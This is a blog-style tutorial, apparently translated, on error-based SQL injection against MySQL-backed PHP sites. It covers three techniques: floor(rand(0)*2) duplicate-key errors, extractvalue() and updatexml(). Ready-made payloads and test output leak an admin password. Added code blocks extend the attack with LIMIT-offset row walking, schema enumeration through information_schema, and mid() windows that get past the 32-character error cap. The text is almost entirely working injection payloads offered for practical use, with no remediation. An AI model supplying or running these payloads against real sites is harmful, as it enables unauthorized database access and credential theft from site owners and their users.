Posting some old notes. MySQL throws an error message when a statement fails, and PHP+MySQL sites often print that error straight onto the page, so the following three techniques can be used to pull specific data out through the error text.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)))

Why this errors: rand(0) is seeded, so floor(rand(0)*2) yields the same 0,1,1,0,1,1,... sequence on every run, and GROUP BY evaluates the key expression a second time when it inserts a new key into its temporary table. With at least three rows in the source table the recomputed key collides with one already inserted, and the duplicate-key error carries the concatenated value. information_schema.tables always has enough rows; the three-row UNION in the second payload is there for the same reason.
Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version has been leaked successfully (the trailing 1 is the floor() value, not part of the data). To read anything else, replace version() with the subquery you want.
For example, to get the admin user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
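The following is an added example, not code from the original post. It recreates the post's test database (the database name "test", the table and column names come from the post; the row values and the second admin row are constructed here) and then walks the floor(rand(0)*2) trick through several rows, including the three-row requirement and the LIMIT offset used to read the table row by row. Behaviour was worked out against MySQL 5.x; newer versions word the duplicate-key error slightly differently but still fail on it.

```sql
-- Added example (not part of the original post). Database, table and column
-- names are the post's; the inserted rows are constructed sample data.
CREATE DATABASE IF NOT EXISTS test;
USE test;
DROP TABLE IF EXISTS admin, article;
CREATE TABLE admin (
  id   INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user VARCHAR(50) NOT NULL,
  pass VARCHAR(50) NOT NULL
);
CREATE TABLE article (
  id      INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  title   VARCHAR(50) NOT NULL,
  content VARCHAR(50) NOT NULL
);
INSERT INTO admin (user, pass) VALUES ('admin', 'admin888'), ('editor', 'editor123');
INSERT INTO article (title, content) VALUES ('test', 'do it');

-- rand(0) is seeded, so this sequence is identical on every run: 0,1,1,0,1,1,...
SELECT floor(rand(0)*2) AS k FROM information_schema.tables LIMIT 6;

-- The derived table must supply at least three rows. With two rows GROUP BY
-- stores key "1" (recomputed on insert) and then finds "1" for the second
-- row, so the statement completes; a third row recomputes to "1" on insert
-- and collides with the stored key, which is what raises ERROR 1062.
SELECT count(*) FROM (SELECT 1 UNION SELECT 2) x
  GROUP BY concat(version(), floor(rand(0)*2));        -- two rows: completes
SELECT count(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x
  GROUP BY concat(version(), floor(rand(0)*2));        -- three rows: duplicate key

-- Each payload leaks one row. Step the LIMIT offset to walk the table, and
-- use 0x3a (':') to pack several columns into the one key that gets echoed.
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM (SELECT count(*),
  concat((SELECT concat(user, 0x3a, pass) FROM admin LIMIT 0,1),
         floor(rand(0)*2)) x
  FROM information_schema.tables GROUP BY x) a);      -- first admin row
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM (SELECT count(*),
  concat((SELECT concat(user, 0x3a, pass) FROM admin LIMIT 1,1),
         floor(rand(0)*2)) x
  FROM information_schema.tables GROUP BY x) a);      -- second admin row

-- The same shape enumerates schema objects before the data is known:
-- here the second column of admin, read from information_schema.columns.
SELECT * FROM article WHERE id = 1 AND (SELECT 1 FROM (SELECT count(*),
  concat((SELECT column_name FROM information_schema.columns
          WHERE table_schema = database() AND table_name = 'admin' LIMIT 1,1),
         floor(rand(0)*2)) x
  FROM information_schema.tables GROUP BY x) a);
```

Each of the last three statements fails with ERROR 1062, and the text between the quotes is the leaked value followed by the floor() digit, exactly as in the post's 'admin8881' output; strip that last character before using the data. Because every error carries only one key, the offset in LIMIT n,1 is what moves you to the next row or column.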
2. ExtractValue
Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

0x5c is a backslash. Since '\' is not valid XPath, extractvalue() fails and echoes the offending string in the error message; the message shows at most 32 characters.
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

0x5e24 is '^$', placed on both sides of the value so the leaked string is clearly delimited in the error.
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
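The following is an added example covering both the ExtractValue and UpdateXml sections; it is not code from the original post. It needs no setup, because it only reads built-in functions and information_schema, on MySQL 5.1.5 or later (where extractvalue() and updatexml() first appeared). It shows the three things the post's one-liners do not: why the junk separator is required at all, how NULL results hide themselves, and how to get past the 32-character cap on the XPath error text. 0x7e ('~') is used as the separator in place of the post's 0x5c and 0x5e24.

```sql
-- Added example (not part of the original post). Runs on any MySQL >= 5.1.5
-- with no tables of its own; the 'no_such_table' name is a constructed miss.

-- 1. The separator is what makes the call fail. A leaked value that is by
--    itself a valid XPath expression (a plain name like admin888) does not
--    raise an error, so nothing would reach the error page without it.
SELECT extractvalue(1, 'admin888');                  -- valid XPath name test: no error raised
SELECT extractvalue(1, concat(0x7e, 'admin888'));    -- '~' is invalid XPath: the error echoes the string

-- 2. NULL is swallowed too: concat() of any NULL argument is NULL, and
--    extractvalue(1, NULL) returns NULL without an error. Wrap subqueries
--    that may match nothing in ifnull() so an empty result is visible.
SELECT extractvalue(1, concat(0x7e, (SELECT table_name FROM information_schema.tables
                                     WHERE table_name = 'no_such_table')));
SELECT extractvalue(1, concat(0x7e, ifnull((SELECT table_name FROM information_schema.tables
                                            WHERE table_name = 'no_such_table'), 'NULL')));

-- 3. The XPath error text is capped at 32 characters, separator included,
--    so a 40-character value is cut down to the separator plus 31 characters.
SELECT extractvalue(1, concat(0x7e, repeat('A', 40)));

-- 4. Read longer results in 31-character windows with mid(): offsets 1, 32, 63, ...
--    group_concat() packs many rows into one string so each error leaks several names
--    (its result is itself capped by group_concat_max_len, 1024 bytes by default).
SELECT extractvalue(1, concat(0x7e, mid((SELECT group_concat(table_name)
        FROM information_schema.tables WHERE table_schema = 'information_schema'), 1, 31)));
SELECT extractvalue(1, concat(0x7e, mid((SELECT group_concat(table_name)
        FROM information_schema.tables WHERE table_schema = 'information_schema'), 32, 31)));

-- 5. updatexml() errors the same way. Bracketing the value on both sides, as
--    the post's 0x5e24 ... 0x5e24 does, tells you whether it was truncated:
--    the closing marker is missing whenever the 32-character cap was hit.
SELECT updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1);
SELECT updatexml(1, concat(0x7e, (SELECT group_concat(schema_name)
        FROM information_schema.schemata), 0x7e), 1);
```

In practice the statements in steps 2 to 5 are what you put after `and` in the injectable parameter, one at a time, advancing the mid() offset by 31 until the error comes back with only the separator. The floor() method has no 32-character cap but leaks one row per request; these two functions are shorter payloads but need the window loop for anything longer than a password.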
That's all, thanks to the foreign guys.